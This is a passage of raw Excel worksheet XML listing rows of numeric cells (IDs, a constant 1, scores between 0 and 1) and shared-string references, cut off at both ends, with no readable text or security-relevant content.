      <c r="D2349">
        <v>1</v>
      </c>
      <c r="E2349">
        <v>0.99970000982284546</v>
      </c>
      <c r="F2349" t="s">
        <v>3911</v>
      </c>
      <c r="G2349" t="s">
        <v>4636</v>
      </c>
      <c r="H2349" t="s">
        <v>4298</v>
      </c>
    </row>
    <row r="2350" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2350" s="1">
        <v>2348</v>
      </c>
      <c r="B2350">
        <v>2821</v>
      </c>
      <c r="C2350">
        <v>2821</v>
      </c>
      <c r="D2350">
        <v>1</v>
      </c>
      <c r="E2350">
        <v>0.81050002574920654</v>
      </c>
      <c r="F2350" t="s">
        <v>3911</v>
      </c>
      <c r="G2350" t="s">
        <v>4637</v>
      </c>
      <c r="H2350" t="s">
        <v>4638</v>
      </c>
    </row>
    <row r="2351" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2351" s="1">
        <v>2349</v>
      </c>
      <c r="B2351">
        <v>594</v>
      </c>
      <c r="C2351">
        <v>594</v>
      </c>
      <c r="D2351">
        <v>1</v>
      </c>
      <c r="E2351">
        <v>0.98680001497268677</v>
      </c>
      <c r="F2351" t="s">
        <v>3911</v>
      </c>
      <c r="G2351" t="s">
        <v>4639</v>
      </c>
      <c r="H2351" t="s">
        <v>4640</v>
      </c>
    </row>
    <row r="2352" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2352" s="1">
        <v>2350</v>
      </c>
      <c r="B2352">
        <v>5338</v>
      </c>
      <c r="C2352">
        <v>5338</v>
      </c>
      <c r="D2352">
        <v>1</v>
      </c>
      <c r="E2352">
        <v>0.76029998064041138</v>
      </c>
      <c r="F2352" t="s">
        <v>3911</v>
      </c>
      <c r="G2352" t="s">
        <v>4641</v>
      </c>
      <c r="H2352" t="s">
        <v>4642</v>
      </c>
    </row>
    <row r="2353" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2353" s="1">
        <v>2351</v>
      </c>
      <c r="B2353">
        <v>3028</v>
      </c>
      <c r="C2353">
        <v>3028</v>
      </c>
      <c r="D2353">
        <v>1</v>
      </c>
      <c r="E2353">
        <v>0.65119999647140503</v>
      </c>
      <c r="F2353" t="s">
        <v>3911</v>
      </c>
      <c r="G2353" t="s">
        <v>4643</v>
      </c>
      <c r="H2353" t="s">
        <v>4644</v>
      </c>
    </row>
    <row r="2354" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2354" s="1">
        <v>2352</v>
      </c>
      <c r="B2354">
        <v>5215</v>
      </c>
      <c r="C2354">
        <v>5215</v>
      </c>
      <c r="D2354">
        <v>1</v>
      </c>
      <c r="E2354">
        <v>0.79919999837875366</v>
      </c>
      <c r="F2354" t="s">
        <v>3911</v>
      </c>
      <c r="G2354" t="s">
        <v>4645</v>
      </c>
      <c r="H2354" t="s">
        <v>4646</v>
      </c>
    </row>
    <row r="2355" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2355" s="1">
        <v>2353</v>
      </c>
      <c r="B2355">
        <v>7171</v>
      </c>
      <c r="C2355">
        <v>7171</v>
      </c>
      <c r="D2355">
        <v>1</v>
      </c>
      <c r="E2355">
        <v>0.99819999933242798</v>
      </c>
      <c r="F2355" t="s">
        <v>3911</v>
      </c>
      <c r="G2355" t="s">
        <v>4647</v>
      </c>
      <c r="H2355" t="s">
        <v>4648</v>
      </c>
    </row>
    <row r="2356" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2356" s="1">
        <v>2354</v>
      </c>
      <c r="B2356">
        <v>1653</v>
      </c>
      <c r="C2356">
        <v>1653</v>
      </c>
      <c r="D2356">
        <v>1</v>
      </c>
      <c r="E2356">
        <v>0.61210000514984131</v>
      </c>
      <c r="F2356" t="s">
        <v>3911</v>
      </c>
      <c r="G2356" t="s">
        <v>4649</v>
      </c>
      <c r="H2356" t="s">
        <v>4650</v>
      </c>
    </row>
    <row r="2357" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2357" s="1">
        <v>2355</v>
      </c>
      <c r="B2357">
        <v>6343</v>
      </c>
      <c r="C2357">
        <v>6343</v>
      </c>
      <c r="D2357">
        <v>1</v>
      </c>
      <c r="E2357">
        <v>0.6754000186920166</v>
      </c>
      <c r="F2357" t="s">
        <v>3911</v>
      </c>
      <c r="G2357" t="s">
        <v>4651</v>
      </c>
      <c r="H2357" t="s">
        <v>4652</v>
      </c>
    </row>
    <row r="2358" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2358" s="1">
        <v>2356</v>
      </c>
      <c r="B2358">
        <v>7170</v>
      </c>
      <c r="C2358">
        <v>7170</v>
      </c>
      <c r="D2358">
        <v>1</v>
      </c>
      <c r="E2358">
        <v>0.55760002136230469</v>
      </c>
      <c r="F2358" t="s">
        <v>3911</v>
      </c>
      <c r="G2358" t="s">
        <v>4653</v>
      </c>
      <c r="H2358" t="s">
        <v>4654</v>
      </c>
    </row>
    <row r="2359" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2359" s="1">
        <v>2357</v>
      </c>
      <c r="B2359">
        <v>4679</v>
      </c>
      <c r="C2359">
        <v>4679</v>
      </c>
      <c r="D2359">
        <v>1</v>
      </c>
      <c r="E2359">
        <v>0.35510000586509699</v>
      </c>
      <c r="F2359" t="s">
        <v>3911</v>
      </c>
      <c r="G2359" t="s">
        <v>4655</v>
      </c>
      <c r="H2359" t="s">
        <v>4656</v>
      </c>
    </row>
    <row r="2360" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2360" s="1">
        <v>2358</v>
      </c>
      <c r="B2360">
        <v>1658</v>
      </c>
      <c r="C2360">
        <v>1658</v>
      </c>
      <c r="D2360">
        <v>1</v>
      </c>
      <c r="E2360">
        <v>0.99409997463226318</v>
      </c>
      <c r="F2360" t="s">
        <v>3911</v>
      </c>
      <c r="G2360" t="s">
        <v>4657</v>
      </c>
      <c r="H2360" t="s">
        <v>4658</v>
      </c>
    </row>
    <row r="2361" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2361" s="1">
        <v>2359</v>
      </c>
      <c r="B2361">
        <v>4678</v>
      </c>
      <c r="C2361">
        <v>4678</v>
      </c>
      <c r="D2361">
        <v>1</v>
      </c>
      <c r="E2361">
        <v>0.99629998207092285</v>
      </c>
      <c r="F2361" t="s">
        <v>3911</v>
      </c>
      <c r="G2361" t="s">
        <v>4659</v>
      </c>
      <c r="H2361" t="s">
        <v>4660</v>
      </c>
    </row>
    <row r="2362" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2362" s="1">
        <v>2360</v>
      </c>
      <c r="B2362">
        <v>4677</v>
      </c>
      <c r="C2362">
        <v>4677</v>
      </c>
      <c r="D2362">
        <v>1</v>
      </c>
      <c r="E2362">
        <v>0.99930000305175781</v>
      </c>
      <c r="F2362" t="s">
        <v>3911</v>
      </c>
      <c r="G2362" t="s">
        <v>4661</v>
      </c>
      <c r="H2362" t="s">
        <v>4662</v>
      </c>
    </row>
    <row r="2363" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2363" s="1">
        <v>2361</v>
      </c>
      <c r="B2363">
        <v>4676</v>
      </c>
      <c r="C2363">
        <v>4676</v>
      </c>
      <c r="D2363">
        <v>1</v>
      </c>
      <c r="E2363">
        <v>0.56779998540878296</v>
      </c>
      <c r="F2363" t="s">
        <v>3911</v>
      </c>
      <c r="G2363" t="s">
        <v>4663</v>
      </c>
      <c r="H2363" t="s">
        <v>4664</v>
      </c>
    </row>
    <row r="2364" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2364" s="1">
        <v>2362</v>
      </c>
      <c r="B2364">
        <v>1663</v>
      </c>
      <c r="C2364">
        <v>1663</v>
      </c>
      <c r="D2364">
        <v>1</v>
      </c>
      <c r="E2364">
        <v>0.87559998035430908</v>
      </c>
      <c r="F2364" t="s">
        <v>3911</v>
      </c>
      <c r="G2364" t="s">
        <v>4665</v>
      </c>
      <c r="H2364" t="s">
        <v>4666</v>
      </c>
    </row>
    <row r="2365" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2365" s="1">
        <v>2363</v>
      </c>
      <c r="B2365">
        <v>1664</v>
      </c>
      <c r="C2365">
        <v>1664</v>
      </c>
      <c r="D2365">
        <v>1</v>
      </c>
      <c r="E2365">
        <v>0.40189999341964722</v>
      </c>
      <c r="F2365" t="s">
        <v>3911</v>
      </c>
      <c r="G2365" t="s">
        <v>4667</v>
      </c>
      <c r="H2365" t="s">
        <v>4668</v>
      </c>
    </row>
    <row r="2366" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2366" s="1">
        <v>2364</v>
      </c>
      <c r="B2366">
        <v>3719</v>
      </c>
      <c r="C2366">
        <v>3719</v>
      </c>
      <c r="D2366">
        <v>1</v>
      </c>
      <c r="E2366">
        <v>0.98360002040863037</v>
      </c>
      <c r="F2366" t="s">
        <v>3911</v>
      </c>
      <c r="G2366" t="s">
        <v>4669</v>
      </c>
      <c r="H2366" t="s">
        <v>4670</v>
      </c>
    </row>
    <row r="2367" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2367" s="1">
        <v>2365</v>
      </c>
      <c r="B2367">
        <v>5814</v>
      </c>
      <c r="C2367">
        <v>5814</v>
      </c>
      <c r="D2367">
        <v>1</v>
      </c>
      <c r="E2367">
        <v>0.9089999794960022</v>
      </c>
      <c r="F2367" t="s">
        <v>3911</v>
      </c>
      <c r="G2367" t="s">
        <v>4671</v>
      </c>
      <c r="H2367" t="s">
        <v>4672</v>
      </c>
    </row>
    <row r="2368" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2368" s="1">
        <v>2366</v>
      </c>
      <c r="B2368">
        <v>3525</v>
      </c>
      <c r="C2368">
        <v>3525</v>
      </c>
      <c r="D2368">
        <v>1</v>
      </c>
      <c r="E2368">
        <v>0.99919998645782471</v>
      </c>
      <c r="F2368" t="s">
        <v>3911</v>
      </c>
      <c r="G2368" t="s">
        <v>4673</v>
      </c>
      <c r="H2368" t="s">
        <v>4674</v>
      </c>
    </row>
    <row r="2369" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2369" s="1">
        <v>2367</v>
      </c>
      <c r="B2369">
        <v>3524</v>
      </c>
      <c r="C2369">
        <v>3524</v>
      </c>
      <c r="D2369">
        <v>1</v>
      </c>
      <c r="E2369">
        <v>0.92019999027252197</v>
      </c>
      <c r="F2369" t="s">
        <v>3911</v>
      </c>
      <c r="G2369" t="s">
        <v>4675</v>
      </c>
      <c r="H2369" t="s">
        <v>4676</v>
      </c>
    </row>
    <row r="2370" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2370" s="1">
        <v>2368</v>
      </c>
      <c r="B2370">
        <v>3523</v>
      </c>
      <c r="C2370">
        <v>3523</v>
      </c>
      <c r="D2370">
        <v>1</v>
      </c>
      <c r="E2370">
        <v>0.99919998645782471</v>
      </c>
      <c r="F2370" t="s">
        <v>3911</v>
      </c>
      <c r="G2370" t="s">
        <v>4677</v>
      </c>
      <c r="H2370" t="s">
        <v>4674</v>
      </c>
    </row>
    <row r="2371" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2371" s="1">
        <v>2369</v>
      </c>
      <c r="B2371">
        <v>6418</v>
      </c>
      <c r="C2371">
        <v>6418</v>
      </c>
      <c r="D2371">
        <v>1</v>
      </c>
      <c r="E2371">
        <v>0.99730002880096436</v>
      </c>
      <c r="F2371" t="s">
        <v>3911</v>
      </c>
      <c r="G2371" t="s">
        <v>4678</v>
      </c>
      <c r="H2371" t="s">
        <v>4679</v>
      </c>
    </row>
    <row r="2372" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2372" s="1">
        <v>2370</v>
      </c>
      <c r="B2372">
        <v>4997</v>
      </c>
      <c r="C2372">
        <v>4997</v>
      </c>
      <c r="D2372">
        <v>1</v>
      </c>
      <c r="E2372">
        <v>0.99889999628067017</v>
      </c>
      <c r="F2372" t="s">
        <v>3911</v>
      </c>
      <c r="G2372" t="s">
        <v>4680</v>
      </c>
      <c r="H2372" t="s">
        <v>4681</v>
      </c>
    </row>
    <row r="2373" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2373" s="1">
        <v>2371</v>
      </c>
      <c r="B2373">
        <v>4996</v>
      </c>
      <c r="C2373">
        <v>4996</v>
      </c>
      <c r="D2373">
        <v>1</v>
      </c>
      <c r="E2373">
        <v>0.84380000829696655</v>
      </c>
      <c r="F2373" t="s">
        <v>3911</v>
      </c>
      <c r="G2373" t="s">
        <v>4682</v>
      </c>
      <c r="H2373" t="s">
        <v>4683</v>
      </c>
    </row>
    <row r="2374" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2374" s="1">
        <v>2372</v>
      </c>
      <c r="B2374">
        <v>5809</v>
      </c>
      <c r="C2374">
        <v>5809</v>
      </c>
      <c r="D2374">
        <v>1</v>
      </c>
      <c r="E2374">
        <v>0.99919998645782471</v>
      </c>
      <c r="F2374" t="s">
        <v>3911</v>
      </c>
      <c r="G2374" t="s">
        <v>4684</v>
      </c>
      <c r="H2374" t="s">
        <v>4685</v>
      </c>
    </row>
    <row r="2375" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2375" s="1">
        <v>2373</v>
      </c>
      <c r="B2375">
        <v>4994</v>
      </c>
      <c r="C2375">
        <v>4994</v>
      </c>
      <c r="D2375">
        <v>1</v>
      </c>
      <c r="E2375">
        <v>0.42399999499320978</v>
      </c>
      <c r="F2375" t="s">
        <v>3911</v>
      </c>
      <c r="G2375" t="s">
        <v>4686</v>
      </c>
      <c r="H2375" t="s">
        <v>4687</v>
      </c>
    </row>
    <row r="2376" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2376" s="1">
        <v>2374</v>
      </c>
      <c r="B2376">
        <v>6421</v>
      </c>
      <c r="C2376">
        <v>6421</v>
      </c>
      <c r="D2376">
        <v>1</v>
      </c>
      <c r="E2376">
        <v>0.5593000054359436</v>
      </c>
      <c r="F2376" t="s">
        <v>3911</v>
      </c>
      <c r="G2376" t="s">
        <v>4688</v>
      </c>
      <c r="H2376" t="s">
        <v>4689</v>
      </c>
    </row>
    <row r="2377" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2377" s="1">
        <v>2375</v>
      </c>
      <c r="B2377">
        <v>5810</v>
      </c>
      <c r="C2377">
        <v>5810</v>
      </c>
      <c r="D2377">
        <v>1</v>
      </c>
      <c r="E2377">
        <v>0.99779999256134033</v>
      </c>
      <c r="F2377" t="s">
        <v>3911</v>
      </c>
      <c r="G2377" t="s">
        <v>4690</v>
      </c>
      <c r="H2377" t="s">
        <v>4691</v>
      </c>
    </row>
    <row r="2378" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2378" s="1">
        <v>2376</v>
      </c>
      <c r="B2378">
        <v>6414</v>
      </c>
      <c r="C2378">
        <v>6414</v>
      </c>
      <c r="D2378">
        <v>1</v>
      </c>
      <c r="E2378">
        <v>0.99919998645782471</v>
      </c>
      <c r="F2378" t="s">
        <v>3911</v>
      </c>
      <c r="G2378" t="s">
        <v>4692</v>
      </c>
      <c r="H2378" t="s">
        <v>4693</v>
      </c>
    </row>
    <row r="2379" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2379" s="1">
        <v>2377</v>
      </c>
      <c r="B2379">
        <v>75</v>
      </c>
      <c r="C2379">
        <v>75</v>
      </c>
      <c r="D2379">
        <v>1</v>
      </c>
      <c r="E2379">
        <v>0.77880001068115234</v>
      </c>
      <c r="F2379" t="s">
        <v>3911</v>
      </c>
      <c r="G2379" t="s">
        <v>4694</v>
      </c>
      <c r="H2379" t="s">
        <v>4695</v>
      </c>
    </row>
    <row r="2380" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2380" s="1">
        <v>2378</v>
      </c>
      <c r="B2380">
        <v>1057</v>
      </c>
      <c r="C2380">
        <v>1057</v>
      </c>
      <c r="D2380">
        <v>1</v>
      </c>
      <c r="E2380">
        <v>0.6524999737739563</v>
      </c>
      <c r="F2380" t="s">
        <v>3911</v>
      </c>
      <c r="G2380" t="s">
        <v>4696</v>
      </c>
      <c r="H2380" t="s">
        <v>4697</v>
      </c>
    </row>
    <row r="2381" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2381" s="1">
        <v>2379</v>
      </c>
      <c r="B2381">
        <v>7426</v>
      </c>
      <c r="C2381">
        <v>7426</v>
      </c>
      <c r="D2381">
        <v>1</v>
      </c>
      <c r="E2381">
        <v>0.53039997816085815</v>
      </c>
      <c r="F2381" t="s">
        <v>3911</v>
      </c>
      <c r="G2381" t="s">
        <v>4698</v>
      </c>
      <c r="H2381" t="s">
        <v>4699</v>
      </c>
    </row>
    <row r="2382" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2382" s="1">
        <v>2380</v>
      </c>
      <c r="B2382">
        <v>5812</v>
      </c>
      <c r="C2382">
        <v>5812</v>
      </c>
      <c r="D2382">
        <v>1</v>
      </c>
      <c r="E2382">
        <v>0.99779999256134033</v>
      </c>
      <c r="F2382" t="s">
        <v>3911</v>
      </c>
      <c r="G2382" t="s">
        <v>4700</v>
      </c>
      <c r="H2382" t="s">
        <v>4701</v>
      </c>
    </row>
    <row r="2383" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2383" s="1">
        <v>2381</v>
      </c>
      <c r="B2383">
        <v>74</v>
      </c>
      <c r="C2383">
        <v>74</v>
      </c>
      <c r="D2383">
        <v>1</v>
      </c>
      <c r="E2383">
        <v>0.4512999951839447</v>
      </c>
      <c r="F2383" t="s">
        <v>3911</v>
      </c>
      <c r="G2383" t="s">
        <v>4702</v>
      </c>
      <c r="H2383" t="s">
        <v>4703</v>
      </c>
    </row>
    <row r="2384" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2384" s="1">
        <v>2382</v>
      </c>
      <c r="B2384">
        <v>1081</v>
      </c>
      <c r="C2384">
        <v>1081</v>
      </c>
      <c r="D2384">
        <v>1</v>
      </c>
      <c r="E2384">
        <v>0.93849998712539673</v>
      </c>
      <c r="F2384" t="s">
        <v>3911</v>
      </c>
      <c r="G2384" t="s">
        <v>4704</v>
      </c>
      <c r="H2384" t="s">
        <v>4705</v>
      </c>
    </row>
    <row r="2385" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2385" s="1">
        <v>2383</v>
      </c>
      <c r="B2385">
        <v>4982</v>
      </c>
      <c r="C2385">
        <v>4982</v>
      </c>
      <c r="D2385">
        <v>1</v>
      </c>
      <c r="E2385">
        <v>0.99699997901916504</v>
      </c>
      <c r="F2385" t="s">
        <v>3911</v>
      </c>
      <c r="G2385" t="s">
        <v>4706</v>
      </c>
      <c r="H2385" t="s">
        <v>4707</v>
      </c>
    </row>
    <row r="2386" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2386" s="1">
        <v>2384</v>
      </c>
      <c r="B2386">
        <v>1704</v>
      </c>
      <c r="C2386">
        <v>1704</v>
      </c>
      <c r="D2386">
        <v>1</v>
      </c>
      <c r="E2386">
        <v>0.59030002355575562</v>
      </c>
      <c r="F2386" t="s">
        <v>3911</v>
      </c>
      <c r="G2386" t="s">
        <v>4708</v>
      </c>
      <c r="H2386" t="s">
        <v>4709</v>
      </c>
    </row>
    <row r="2387" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2387" s="1">
        <v>2385</v>
      </c>
      <c r="B2387">
        <v>5815</v>
      </c>
      <c r="C2387">
        <v>5815</v>
      </c>
      <c r="D2387">
        <v>1</v>
      </c>
      <c r="E2387">
        <v>0.55860000848770142</v>
      </c>
      <c r="F2387" t="s">
        <v>3911</v>
      </c>
      <c r="G2387" t="s">
        <v>4710</v>
      </c>
      <c r="H2387" t="s">
        <v>4711</v>
      </c>
    </row>
    <row r="2388" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2388" s="1">
        <v>2386</v>
      </c>
      <c r="B2388">
        <v>1647</v>
      </c>
      <c r="C2388">
        <v>1647</v>
      </c>
      <c r="D2388">
        <v>1</v>
      </c>
      <c r="E2388">
        <v>0.35830000042915339</v>
      </c>
      <c r="F2388" t="s">
        <v>3911</v>
      </c>
      <c r="G2388" t="s">
        <v>4712</v>
      </c>
      <c r="H2388" t="s">
        <v>4713</v>
      </c>
    </row>
    <row r="2389" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2389" s="1">
        <v>2387</v>
      </c>
      <c r="B2389">
        <v>7882</v>
      </c>
      <c r="C2389">
        <v>7882</v>
      </c>
      <c r="D2389">
        <v>1</v>
      </c>
      <c r="E2389">
        <v>0.99879997968673706</v>
      </c>
      <c r="F2389" t="s">
        <v>3911</v>
      </c>
      <c r="G2389" t="s">
        <v>4714</v>
      </c>
      <c r="H2389" t="s">
        <v>4715</v>
      </c>
    </row>
    <row r="2390" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2390" s="1">
        <v>2388</v>
      </c>
      <c r="B2390">
        <v>1101</v>
      </c>
      <c r="C2390">
        <v>1101</v>
      </c>
      <c r="D2390">
        <v>1</v>
      </c>
      <c r="E2390">
        <v>0.94499999284744263</v>
      </c>
      <c r="F2390" t="s">
        <v>3911</v>
      </c>
      <c r="G2390" t="s">
        <v>4716</v>
      </c>
      <c r="H2390" t="s">
        <v>4717</v>
      </c>
    </row>
    <row r="2391" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2391" s="1">
        <v>2389</v>
      </c>
      <c r="B2391">
        <v>1614</v>
      </c>
      <c r="C2391">
        <v>1614</v>
      </c>
      <c r="D2391">
        <v>1</v>
      </c>
      <c r="E2391">
        <v>0.55430001020431519</v>
      </c>
      <c r="F2391" t="s">
        <v>3911</v>
      </c>
      <c r="G2391" t="s">
        <v>4718</v>
      </c>
      <c r="H2391" t="s">
        <v>4719</v>
      </c>
    </row>
    <row r="2392" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2392" s="1">
        <v>2390</v>
      </c>
      <c r="B2392">
        <v>4971</v>
      </c>
      <c r="C2392">
        <v>4971</v>
      </c>
      <c r="D2392">
        <v>1</v>
      </c>
      <c r="E2392">
        <v>0.81859999895095825</v>
      </c>
      <c r="F2392" t="s">
        <v>3911</v>
      </c>
      <c r="G2392" t="s">
        <v>4720</v>
      </c>
      <c r="H2392" t="s">
        <v>4721</v>
      </c>
    </row>
    <row r="2393" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2393" s="1">
        <v>2391</v>
      </c>
      <c r="B2393">
        <v>1603</v>
      </c>
      <c r="C2393">
        <v>1603</v>
      </c>
      <c r="D2393">
        <v>1</v>
      </c>
      <c r="E2393">
        <v>0.66049998998641968</v>
      </c>
      <c r="F2393" t="s">
        <v>3911</v>
      </c>
      <c r="G2393" t="s">
        <v>4722</v>
      </c>
      <c r="H2393" t="s">
        <v>4723</v>
      </c>
    </row>
    <row r="2394" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2394" s="1">
        <v>2392</v>
      </c>
      <c r="B2394">
        <v>3706</v>
      </c>
      <c r="C2394">
        <v>3706</v>
      </c>
      <c r="D2394">
        <v>1</v>
      </c>
      <c r="E2394">
        <v>0.99540001153945923</v>
      </c>
      <c r="F2394" t="s">
        <v>3911</v>
      </c>
      <c r="G2394" t="s">
        <v>4724</v>
      </c>
      <c r="H2394" t="s">
        <v>4725</v>
      </c>
    </row>
    <row r="2395" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2395" s="1">
        <v>2393</v>
      </c>
      <c r="B2395">
        <v>5819</v>
      </c>
      <c r="C2395">
        <v>5819</v>
      </c>
      <c r="D2395">
        <v>1</v>
      </c>
      <c r="E2395">
        <v>0.99819999933242798</v>
      </c>
      <c r="F2395" t="s">
        <v>3911</v>
      </c>
      <c r="G2395" t="s">
        <v>4726</v>
      </c>
      <c r="H2395" t="s">
        <v>4727</v>
      </c>
    </row>
    <row r="2396" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2396" s="1">
        <v>2394</v>
      </c>
      <c r="B2396">
        <v>7191</v>
      </c>
      <c r="C2396">
        <v>7191</v>
      </c>
      <c r="D2396">
        <v>1</v>
      </c>
      <c r="E2396">
        <v>0.80659997463226318</v>
      </c>
      <c r="F2396" t="s">
        <v>3911</v>
      </c>
      <c r="G2396" t="s">
        <v>4728</v>
      </c>
      <c r="H2396" t="s">
        <v>4729</v>
      </c>
    </row>
    <row r="2397" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2397" s="1">
        <v>2395</v>
      </c>
      <c r="B2397">
        <v>4966</v>
      </c>
      <c r="C2397">
        <v>4966</v>
      </c>
      <c r="D2397">
        <v>1</v>
      </c>
      <c r="E2397">
        <v>0.99390000104904175</v>
      </c>
      <c r="F2397" t="s">
        <v>3911</v>
      </c>
      <c r="G2397" t="s">
        <v>4730</v>
      </c>
      <c r="H2397" t="s">
        <v>4731</v>
      </c>
    </row>
    <row r="2398" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2398" s="1">
        <v>2396</v>
      </c>
      <c r="B2398">
        <v>1590</v>
      </c>
      <c r="C2398">
        <v>1590</v>
      </c>
      <c r="D2398">
        <v>1</v>
      </c>
      <c r="E2398">
        <v>0.75059998035430908</v>
      </c>
      <c r="F2398" t="s">
        <v>3911</v>
      </c>
      <c r="G2398" t="s">
        <v>4732</v>
      </c>
      <c r="H2398" t="s">
        <v>4733</v>
      </c>
    </row>
    <row r="2399" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2399" s="1">
        <v>2397</v>
      </c>
      <c r="B2399">
        <v>5542</v>
      </c>
      <c r="C2399">
        <v>5542</v>
      </c>
      <c r="D2399">
        <v>1</v>
      </c>
      <c r="E2399">
        <v>0.99309998750686646</v>
      </c>
      <c r="F2399" t="s">
        <v>3911</v>
      </c>
      <c r="G2399" t="s">
        <v>4734</v>
      </c>
      <c r="H2399" t="s">
        <v>4735</v>
      </c>
    </row>
    <row r="2400" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2400" s="1">
        <v>2398</v>
      </c>
      <c r="B2400">
        <v>3547</v>
      </c>
      <c r="C2400">
        <v>3547</v>
      </c>
      <c r="D2400">
        <v>1</v>
      </c>
      <c r="E2400">
        <v>0.71090000867843628</v>
      </c>
      <c r="F2400" t="s">
        <v>3911</v>
      </c>
      <c r="G2400" t="s">
        <v>4736</v>
      </c>
      <c r="H2400" t="s">
        <v>4737</v>
      </c>
    </row>
    <row r="2401" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2401" s="1">
        <v>2399</v>
      </c>
      <c r="B2401">
        <v>1124</v>
      </c>
      <c r="C2401">
        <v>1124</v>
      </c>
      <c r="D2401">
        <v>1</v>
      </c>
      <c r="E2401">
        <v>0.99739998579025269</v>
      </c>
      <c r="F2401" t="s">
        <v>3911</v>
      </c>
      <c r="G2401" t="s">
        <v>4738</v>
      </c>
      <c r="H2401" t="s">
        <v>4739</v>
      </c>
    </row>
    <row r="2402" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2402" s="1">
        <v>2400</v>
      </c>
      <c r="B2402">
        <v>1127</v>
      </c>
      <c r="C2402">
        <v>1127</v>
      </c>
      <c r="D2402">
        <v>1</v>
      </c>
      <c r="E2402">
        <v>0.57249999046325684</v>
      </c>
      <c r="F2402" t="s">
        <v>3911</v>
      </c>
      <c r="G2402" t="s">
        <v>4740</v>
      </c>
      <c r="H2402" t="s">
        <v>4741</v>
      </c>
    </row>
    <row r="2403" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2403" s="1">
        <v>2401</v>
      </c>
      <c r="B2403">
        <v>1133</v>
      </c>
      <c r="C2403">
        <v>1133</v>
      </c>
      <c r="D2403">
        <v>1</v>
      </c>
      <c r="E2403">
        <v>0.99570000171661377</v>
      </c>
      <c r="F2403" t="s">
        <v>3911</v>
      </c>
      <c r="G2403" t="s">
        <v>4742</v>
      </c>
      <c r="H2403" t="s">
        <v>4743</v>
      </c>
    </row>
    <row r="2404" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2404" s="1">
        <v>2402</v>
      </c>
      <c r="B2404">
        <v>7401</v>
      </c>
      <c r="C2404">
        <v>7401</v>
      </c>
      <c r="D2404">
        <v>1</v>
      </c>
      <c r="E2404">
        <v>0.45980000495910639</v>
      </c>
      <c r="F2404" t="s">
        <v>3911</v>
      </c>
      <c r="G2404" t="s">
        <v>4744</v>
      </c>
      <c r="H2404" t="s">
        <v>4745</v>
      </c>
    </row>
    <row r="2405" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2405" s="1">
        <v>2403</v>
      </c>
      <c r="B2405">
        <v>7145</v>
      </c>
      <c r="C2405">
        <v>7145</v>
      </c>
      <c r="D2405">
        <v>1</v>
      </c>
      <c r="E2405">
        <v>0.98500001430511475</v>
      </c>
      <c r="F2405" t="s">
        <v>3911</v>
      </c>
      <c r="G2405" t="s">
        <v>4746</v>
      </c>
      <c r="H2405" t="s">
        <v>4747</v>
      </c>
    </row>
    <row r="2406" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2406" s="1">
        <v>2404</v>
      </c>
      <c r="B2406">
        <v>4699</v>
      </c>
      <c r="C2406">
        <v>4699</v>
      </c>
      <c r="D2406">
        <v>1</v>
      </c>
      <c r="E2406">
        <v>0.99830001592636108</v>
      </c>
      <c r="F2406" t="s">
        <v>3911</v>
      </c>
      <c r="G2406" t="s">
        <v>4748</v>
      </c>
      <c r="H2406" t="s">
        <v>4749</v>
      </c>
    </row>
    <row r="2407" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2407" s="1">
        <v>2405</v>
      </c>
      <c r="B2407">
        <v>7187</v>
      </c>
      <c r="C2407">
        <v>7187</v>
      </c>
      <c r="D2407">
        <v>1</v>
      </c>
      <c r="E2407">
        <v>0.65439999103546143</v>
      </c>
      <c r="F2407" t="s">
        <v>3911</v>
      </c>
      <c r="G2407" t="s">
